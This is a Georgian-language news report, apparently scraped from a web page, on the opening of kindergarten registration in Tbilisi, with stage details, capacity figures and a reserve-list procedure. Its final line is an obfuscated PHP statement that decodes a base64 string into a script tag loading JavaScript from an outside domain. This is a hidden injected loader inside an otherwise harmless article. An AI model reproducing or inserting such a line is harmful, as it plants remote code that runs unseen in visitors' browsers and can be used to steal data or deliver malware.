celsiusi
ავერსი საქკაბელი

თბილისის საბავშვო ბაგა-ბაღებში აღსაზრდელთა საყოველთაო რეგისტრაცია დღეს, 22 ივლისს, 10:00 საათზე დაიწყება.

ცნობისთვის, პირველ ეტაპზე ბაღებში რეგისტრაცია მხოლოდ მიზნობრივმა სოციალურმა ჯგუფებმა შეძლეს, მეორე ეტაპზე თბილისში რეგისტრირებულმა აღსაზრდელებმა, ხოლო ბოლო ეტაპზე, რომელიც დღეს ცხადდება, რეგისტრაციას გაივლიან 2-დან 6 წლამდე საქართველოს მოქალაქე ან ბინადრობის უფლების მქონე ბავშვები, რეგისტრაციის ადგილის განურჩევლად.

თბილისის საბავშვო ბაგა-ბაღების სააგენტოს ხელმძღვანელის, კახა აბულაძის განცხადებით, წელს თბილისის საჯარო ბაღები, ჯამში 18 000-ზე მეტი აღსაზრდელის მიღებას შეძლებს.

აღსანიშნავია, რომ თბილისის სასურველ საჯარო ბაგა-ბაღებში ბევრმა მშობელმა ბავშვი ვერ დაარეგისტრირა, ამ შემთხვევაში მათ შეუძლიათ მიმართონ თავად ბაღის ადმინისტრაციას განცხადებით. თუმცა, დიდი მიმართვიანობის შემთხვევაში მშობლები ბავშვების საცხოვრებელთან ახლოს რეგისტრაციას მაინც ვერ ახერხებენ, რის გამოც, ან კერძო ბაღში ან კიდევ შორს მდებარე ბაღში რეგისტრაცია უწევთ.

"იმ შემთხვევაში, თუ მშობელი ვერ ახერხებს ბავშვის ელექტრონულ რეგისტრაციას, მას შეუძლია, განცხადებით მიმართოს სასურველ საბავშვო ბაგა-ბაღს და ჩაეწეროს სარეზერვო სიაში", - წერია ბაგა-ბაღების მართვის სააგენტოს ინფორმაციაში.

167
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");